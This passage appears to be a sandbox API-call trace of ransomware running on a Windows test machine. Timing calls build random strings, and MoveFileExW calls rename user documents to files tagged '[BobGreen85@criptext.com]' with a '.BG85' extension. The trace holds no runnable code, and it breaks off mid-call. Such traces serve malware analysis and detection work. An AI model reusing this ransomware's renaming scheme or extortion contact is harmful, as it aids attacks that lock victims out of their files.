lpPerformanceCount=0x381fe3c*=19093916016) returned 1 [0070.601] GetTickCount () returned 0x114a767 [0070.601] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093993310) returned 1 [0070.601] GetTickCount () returned 0x114a767 [0070.602] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19094049958) returned 1 [0070.850] GetTickCount () returned 0x114a851 [0070.850] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19118865756) returned 1 [0070.851] GetTickCount () returned 0x114a851 [0070.851] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19118955192) returned 1 [0070.851] GetTickCount () returned 0x114a851 [0070.851] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19119015389) returned 1 [0070.852] GetTickCount () returned 0x114a851 [0070.852] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19119076701) returned 1 [0070.852] GetTickCount () returned 0x114a851 [0070.852] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19119134597) returned 1 [0070.863] GetTickCount () returned 0x114a860 [0070.863] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19120167296) returned 1 [0070.863] GetTickCount () returned 0x114a860 [0070.863] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19120245658) returned 1 [0071.005] GetTickCount () returned 0x114a8ed [0071.006] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19134455381) returned 1 [0071.006] GetTickCount () returned 0x114a8ed [0071.006] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19134531587) returned 1 [0071.007] GetTickCount () returned 0x114a8ed [0071.007] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19134601663) returned 1 [0071.008] GetTickCount () returned 0x114a8ed [0071.008] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19134662025) returned 1 [0071.008] Sleep (dwMilliseconds=0x5dc) [0073.683] GetTickCount () returned 0x114b01e [0073.683] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19402166192) returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0073.683] GetTickCount () returned 0x114b01e [0073.683] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19402313743) returned 1 [0073.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0073.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0073.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0073.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0073.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0073.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0073.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0073.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0073.685] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\[BobGreen85@criptext.com].mrV4KzmG-KtMwL4uf.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\[bobgreen85@criptext.com].mrv4kzmg-ktmwl4uf.bg85"), dwFlags=0x1) returned 1 [0073.693] GetTickCount () returned 0x114b02d [0073.693] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19403170558) returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0073.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0073.693] GetTickCount () returned 0x114b02d [0073.693] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19403242366) returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0073.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0073.694] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n8jJ7uBD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n8jj7ubd.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\[BobGreen85@criptext.com].s8Mpau48-Vz60B89A.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\[bobgreen85@criptext.com].s8mpau48-vz60b89a.bg85"), dwFlags=0x1) returned 1 [0073.695] GetTickCount () returned 0x114b02d [0073.695] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19403417835) returned 1 [0073.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0073.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0073.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0073.696] GetTickCount () returned 0x114b02d [0073.696] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19403566899) returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0073.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0073.697] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N4DNLseE63Z.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n4dnlsee63z.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\[BobGreen85@criptext.com].fOHbbyoB-l2wODLnd.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\[bobgreen85@criptext.com].fohbbyob-l2wodlnd.bg85"), dwFlags=0x1) returned 1 [0075.068] GetTickCount () returned 0x114b175 [0075.068] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19540747760) returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0075.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0075.069] GetTickCount () returned 0x114b175 [0075.069] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19540847800) returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0075.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0075.070] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\nz7KgMH.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\nz7kgmh.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\[BobGreen85@criptext.com].H1muc0Wv-9jC1uNzb.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\[bobgreen85@criptext.com].h1muc0wv-9jc1unzb.bg85"), dwFlags=0x1) returned 1 [0075.780] GetTickCount () returned 0x114b3d5 [0075.780] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19611920951) returned 1 [0075.780] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0075.780] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0075.781] GetTickCount () returned 0x114b3d5 [0075.781] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19611999785) returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0075.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0075.782] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0075.782] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0075.782] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0075.782] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\G5X-hwwH1l2TL.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\g5x-hwwh1l2tl.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\[BobGreen85@criptext.com].UxkZsNgO-jCozA20l.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\[bobgreen85@criptext.com].uxkzsngo-jcoza20l.bg85"), dwFlags=0x1) returned 1 [0075.784] GetTickCount () returned 0x114b3e5 [0075.784] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19612295704) returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0075.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0075.785] GetTickCount () returned 0x114b3e5 [0075.785] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19612379809) returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0075.785] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0075.786] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0075.786] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip"), 